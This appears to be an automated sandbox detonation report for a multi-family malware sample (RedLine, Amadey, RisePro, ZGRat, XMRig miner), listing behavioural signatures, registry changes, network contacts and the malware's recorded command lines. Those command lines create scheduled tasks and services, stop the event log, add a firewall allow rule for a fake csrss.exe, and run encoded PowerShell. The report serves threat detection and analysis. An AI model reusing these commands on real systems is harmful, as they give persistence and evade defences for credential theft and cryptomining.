Analysis Overview
SHA256: 3c2e54cf5340c3b1c1a013e1748db7359339eb1280d73f7f3278eab8c40f7b63
Threat Level: Known bad
The file ec2c94a21a52027c229a7824d4a1c5ca.bin was found to be: Known bad.
Malicious Activity Summary
RedLine
RedLine payload
RisePro
xmrig
Amadey
Detect ZGRat V1
ZGRat
XMRig Miner payload
Modifies Windows Firewall
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Blocklisted process makes network request
Checks BIOS information in registry
Reads user/profile data of web browsers
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Launches sc.exe
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Creates scheduled task(s)
Suspicious behavior: LoadsDriver
Suspicious use of FindShellTrayWindow
Suspicious behavior: CmdExeWriteProcessMemorySpam
Delays execution with timeout.exe
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Analysis: static1
Detonation Overview
Reported: 2024-01-24 04:15
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted: 2024-01-24 04:15
Reported: 2024-01-24 04:18
Platform: win7-20231215-en
Max time kernel: 139s
Max time network: 154s
Signatures
Amadey
Detect ZGRat V1
RedLine
RedLine payload
RisePro
ZGRat
xmrig
XMRig Miner payload
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\num.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000564001\\num.exe" | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\rback.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000567001\\rback.exe" | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2156 set thread context of 2216 | N/A | C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 2980 set thread context of 2492 | N/A | C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe | C:\Windows\system32\conhost.exe |
| PID 2980 set thread context of 2484 | N/A | C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe | C:\Windows\system32\conhost.exe |
| PID 1868 set thread context of 1784 | N/A | C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe | "C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe" |
| C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe" |
| C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F |
| C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe | "C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe | "C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe | "C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe | "C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe" |
| C:\Windows\system32\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S" |
| C:\Windows\system32\mode.com | mode 65,10 |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e file.zip -p4632370330209207692137030328 -oextracted |
| C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe | "C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe" |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_9.zip -oextracted |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_8.zip -oextracted |
| C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe | "C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe" |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_7.zip -oextracted |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_6.zip -oextracted |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_5.zip -oextracted |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_4.zip -oextracted |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_3.zip -oextracted |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_2.zip -oextracted |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_1.zip -oextracted |
| C:\Windows\system32\attrib.exe | attrib +H "xfAk7rC2FeEN35Y8o.exe" |
| C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe | "xfAk7rC2FeEN35Y8o.exe" |
| C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe | "C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe" |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe delete "FLWCUERA" |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto" |
| C:\Windows\SysWOW64\rundll32.exe | "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main |
| C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe | C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe" |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe start "FLWCUERA" |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop eventlog |
| C:\Windows\system32\choice.exe | choice /C Y /N /D Y /T 3 |
| C:\Windows\system32\conhost.exe | C:\Windows\system32\conhost.exe |
| C:\Windows\system32\conhost.exe | conhost.exe |
| C:\Windows\system32\taskeng.exe | taskeng.exe {26E75C87-5A32-40B2-A05C-DB3831445712} S-1-5-21-3427588347-1492276948-3422228430-1000:QVMRJQQO\Admin:Interactive:[1] |
| C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe |
| C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe | "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" |
| C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe |
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| FI | 109.107.182.3:80 | 109.107.182.3 | tcp |
| DE | 144.76.1.85:25894 | | tcp |
| NL | 80.79.4.61:18236 | | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | joxi.net | udp |
| US | 172.67.162.70:80 | joxi.net | tcp |
| US | 172.67.162.70:443 | joxi.net | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted: 2024-01-24 04:15
Reported: 2024-01-24 04:17
Platform: win10v2004-20231222-en
Max time kernel: 24s
Max time network: 152s
Signatures
Amadey
Detect ZGRat V1
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2092 set thread context of 1956 | N/A | C:\Windows\System32\Conhost.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 4748 set thread context of 2224 | N/A | C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe | C:\Windows\SysWOW64\WerFault.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\SysWOW64\WerFault.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe
"C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe"
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
"C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe"
C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe
"C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe
"C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000548001\flesh.exe
"C:\Users\Admin\AppData\Local\Temp\1000548001\flesh.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe
"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe"
C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe
"C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Users\Admin\AppData\Local\Temp\1000556001\latestrocki.exe
"C:\Users\Admin\AppData\Local\Temp\1000556001\latestrocki.exe"
C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\rty25.exe
"C:\Users\Admin\AppData\Local\Temp\rty25.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 352
C:\Users\Admin\AppData\Local\Temp\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\FirstZ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 904
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 984
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\1000560001\kskskfsf.exe
"C:\Users\Admin\AppData\Local\Temp\1000560001\kskskfsf.exe"
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 876 -ip 876
C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp
C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 616
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 876 -ip 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4880 -ip 4880
C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
C:\Users\Admin\AppData\Local\Temp\1000563001\pixellslsss.exe
"C:\Users\Admin\AppData\Local\Temp\1000563001\pixellslsss.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 712
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 356
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2820 -ip 2820
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe
"C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
